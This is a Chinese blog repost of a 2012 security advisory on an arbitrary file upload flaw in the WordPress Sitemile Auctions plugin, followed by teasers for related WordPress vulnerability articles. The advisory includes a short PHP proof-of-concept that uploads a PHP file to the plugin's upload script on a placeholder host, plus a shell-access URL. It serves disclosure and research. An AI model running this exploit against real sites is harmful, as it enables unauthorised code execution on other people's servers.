WordPress Sitemile Auctions插件任意文件上传漏洞

最新推荐文章于 2024-04-20 10:21:31 发布
最新推荐文章于 2024-04-20 10:21:31 发布
阅读量2.7k 收藏
点赞数
分类专栏: 漏洞 文章标签: wordpress php 数据库 mysql 脚本 blog
发布日期: 2012-06-19
更新日期: 2012-06-20

受影响系统:
WordPress Sitemile Auctions Plugin  2.x
描述:
WordPress是一种使用PHP语言和MySQL数据库开发的Blog(博客、网志)引擎,用户可以在支持PHP和MySQL数据库的服务器上建立自己的Blog。

Sitemile Auctions Plugin for WordPress 2.0.1.3之前版本的wp-content/plugins/auctionPlugin/upload.php脚本允许上传任意扩展名的文件到webroot文件夹中,可通过上传恶意PHP脚本执行任意PHP代码。

<*来源:Sammy Forgit
  
  链接: http://secunia.com/advisories/49497/
         http://www.opensyscom.fr/Actualites/wordpress-plugins-wordpress-auctions-plugin-arbitrary-file-upload-vulnerability.html
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Sammy Forgit ()提供了如下测试方法:

PostShell.php
<?php

$uploadfile="lo.php"; 
$ch = curl_init(" http://www.exemple.com/wordpress/wp-content/plugins/auctionPlugin/uploadify/upload.php?folder=/wordpress/wp-content/uploads/");
curl_setopt($ch, CURLOPT_POST, true);   
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>

Shell Access :  http://www.exemple.com/wordpress/wp-content/uploads/lo.php
Filename : [CTRL-u] PostShell.php after executed

lo.php
<?php
phpinfo();
?>

建议:
厂商补丁:

WordPress
---------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://wordpress.org/

浏览次数: 56
严重程度: 0(网友投票)
fengling132
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
漏洞复现】WordPress插件wp-file-manager任意文件上传漏洞(CVE-2020-25213)
做自己喜欢的事,并将其发挥到极致!
09-15 926
WordPress是使用PHP语言开发的博客平台,用户可以在支持PHPMySQL数据库的服务器上架设属于自己的网站。也可以把WordPress当作一个内容管理系统(CMS)来使用。文件管理器允许您直接从WordPress后端编辑、删除、上传、下载、压缩、复制和粘贴文件和文件夹。有史以来功能最强大、最灵活、最简单的WordPress文件管理解决方案。WordPress插件WPFileManager中存在一个严重的安全漏洞,攻击者可以在安装了此插件的任何WordPress网站上任意上传文件并远程代码执行。
WordPress插件File-Manager任意文件上传漏洞
m0_48520508的博客
12-07 889
0x00简介 WordPress是使用PHP语言开发的博客平台,用户可以在支持PHPMySQL数据库的服务器上架设属于自己的网站。也可以把 WordPress当作一个内容管理系统(CMS)来使用。 File-Manager插件介绍 文件管理器 File Manager 为您提供编辑、删除、上载、下载、复制和粘贴文件和文件夹的功能。您可以轻松地将文件夹或任何文件从一个位置复制,移动到另一个位置。File Manager 插件分为免费版本和收费版本,其中免费版本已经满足大多数站长需求,当然,如果经济比较好的站
wordpress漏洞上传php文件,WordPress wp-admin/includes/file.php任意文件上传漏洞
weixin_31861847的博客
03-09 541
影响版本:WordPress <= 2.8.5漏洞描述:WordPress是一款免费的论坛Blog系统。WordPress中负责上传文件的代码如下:wp-admin/includes/file.php:---[cut]---line 217:function wp_handle_upload( &$file, $overrides = false, $time = null ) {-...
WordPress 插件存在漏洞,500 万网站面临严重安全风险
最新发布
dzqxwzoe的博客
04-20 1167
网络安全研究人员近期发现 WordPress LiteSpeed Cache 插件中存在一个安全漏洞,该漏洞被追踪为CVE-2023-40000,未经身份验证的威胁攻击者可利用该漏洞获取超额权限。!small?LiteSpeed Cache 主要用于提高网站性能,据不完全统计已经有 500 多万安装用户。Patchstack 研究员 Rafie Muhammad 表示,LiteSpeed Cache。
WordPress插件File-Manager任意文件上传漏洞复现
锋刃科技的博客
10-12 4171
简介 WordPress插件WPFileManager中存在一个严重的0day安全漏洞,攻击者可以在安装了此插件的任何WordPress网站上任意上传文件并远程执行代码。 影响版本 File Manager 6.0-6.8 环境搭建 Wordpress下载地址 https://cn.wordpress.org/wordpress-5.4.1-zh_CN.tar.gz 插件下载地址 http://plugins.svn.wordpress.org/wp-file-ma...
渗透测试——漏洞扫描工具
wuli1024的博客
11-20 349
然后还要将all这个压缩包里的plugin_feed_info.inc提取出来,命令行是 tar -zxvf all-2.0.tar.gz plugin_feed_info.inc,然鹅,我提取不出来。将下载好的插件移动到Nessus目录下,然后输入sudo /opt/nessus/sbin/nessuscli update all-2.0.tar.gz。用户名和密码随便写写就好,随后将会更新补丁,OK,这样Nessus可以使用了。将会获得一串数字,然后去激活码的这个网站,输入自己的邮箱获取激活码。
WordPress插件】2022年最新版完整功能demo+插件v2.0.11.zip
03-31
"【WordPress插件】2022年最新版完整功能demo+插件v2.0.11 YITH WooCommerce Auctions 伊斯思沃蒙德拍卖" ---------- 泰森云每天更新发布最新WordPress主题、HTML主题、WordPress插件、shopify主题、opencart主题、...
AUTO BIDDER JAPAN CAR AUCTIONS-crx插件
04-02
这款" AUTO BIDDER JAPAN CAR AUCTIONS "的CRX文件,就是用来安装到Chrome浏览器中的插件,让用户在浏览janjapan.com时能够利用其功能。 该插件的主要特点和功能包括: 1. **自动投标**:此插件允许用户预先设置...
拍卖源码java-Auctions:用于拍卖物品的Bukkit插件
06-16
Auctions 是一个 Bukkit/Spigot 插件,允许服务器上的玩家拍卖他们的物品以换取金钱。 当前功能包括: 密封拍卖 Herochat 渠道整合 通过操作栏广播 拍卖队列 垃圾邮件减少方法 Auctions 是开源的,可在 GNU 通用公共...
wordpress漏洞上传php文件夹,WordPress Asset-Manager PHP文件上传漏洞
weixin_39517054的博客
04-04 221
这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。### This file is part of the Metasploit Framework and may be subject to# redistribution and co...
漏洞分析】WordPress任意文件上传漏洞
weixin_30456039的博客
08-10 599
影响版本: WordPress <= 2.8.5漏洞描述: BUGTRAQ ID: 37005 WordPress是一款免费的论坛Blog系统。 WordPress中负责上传文件的代码如下: wp-admin/includes/file.php: ---[cut]--- line 217: function wp_handle_upload( &$file, $overri...
wordpress漏洞_Wordpress File-manager 任意文件上传漏洞复现
weixin_39960793的博客
12-12 1912
一、漏洞介绍软件及漏洞简介:wordpress File Manager插件 是最强悍和便利的WordPress文件管理插件,可以直接在WordPress后台管理你网站的所有文件,可以完全替代FTP,甚至功能要比FTP还要丰富,可以在线上传、下载、压缩、解压、查看、编辑文件等。WordPress插件WPFileManager中存在一个严重的0day安全漏洞,攻击者可以在安装了此插件的任何WordP...
WordPress OptimizePress插件任意文件上传漏洞
weixin_30411819的博客
12-17 166
漏洞版本: WordPress OptimizePress Plugin 1.x 漏洞描述: WordPress是一种使用PHP语言开发的博客平台,用户可以在支持PHPMySQL数据库的服务器上架设自己的网志。 '/wp-content/themes/OptimizePress/lib/admin/media-upload.php'不正确校验用户提交的上传文件扩展,允许远...
uploadify php处理程序,WordPress插件Foxypress uploadify.php任意代码执行
weixin_31739613的博客
04-02 130
require 'msf/core'class Metasploit3 < Msf::Exploit::RemoteRank = ExcellentRankinginclude Msf::Exploit::Remote::HttpClientdef initialize(info = {})super(update_info(info,'Name' => 'Word...
wordpress漏洞上传php文件,WordPress Foxypress插件\'uploadify.php\'任意文件上传漏洞
weixin_39535125的博客
03-09 356
WordPress Foxypress插件\'uploadify.php\'任意文件上传漏洞信息来源:Sammy Forgit 发表日期:2013-05-01 14:59:00FoxyPress是WordPress博客软件插件。Foxypress 0.4.1.1-0.4.2.1版本的wp-content/plugins/foxypress/uploadify/uploadify.php脚...
(环境搭建+复现) Wordpress文件管理插件任意文件上传漏洞
daxi0ng的博客
09-25 1910
0x00 简介 WordPress是使用PHP语言开发的博客平台,用户可以在支持PHPMySQL数据库的服务器上架设属于自己的网站。也可以把 WordPress当作一个内容管理系统(CMS)来使用。 文件管理器允许您直接从WordPress后端编辑,删除,上载,下载,压缩,复制和粘贴文件和文件夹。不必费心使用FTP来管理文件和从一个位置移动文件。有史以来功能最强大,最灵活,最简单的WordPress文件管理解决方案! 0x01 漏洞概述 安全人员进行调查时,很快发现WordPress插件.
PHP代码审计7—文件上传漏洞
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
08-01 3258
文件上传基础整理与示例分析
通过共享文件逻辑漏洞渗透wordpress
L_lemo004的博客
06-25 769
扫描IP 这里我的内网网段为31网段,所有我们使用ipscan扫描31网段,发现疑似站点IP 192.168.31.236,成功访问 扫描端口 确定IP后查看其开放了哪些端口 开放了22,80,139,445,3306,6667 尝试爆破22端口弱口令 ...
遇到问题-----web-----uploadify上传工具的坑----清除浏览器缓存后初始化失败不报错--uploadify初始化失效
直到世界的尽头
04-11 2967
现象正常情况下初始化uploadify上传工具成功,可以正常上传图片。但是有时候初始化失败,但是没有报错信息。后来经过排查发现清除浏览器缓存后初始化失败不报错。初始化使用代码如下: //初始化图片上传容器 var initImageUploader = function() { $('.img_upload_uploader, .lineImg_upload_uploade

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值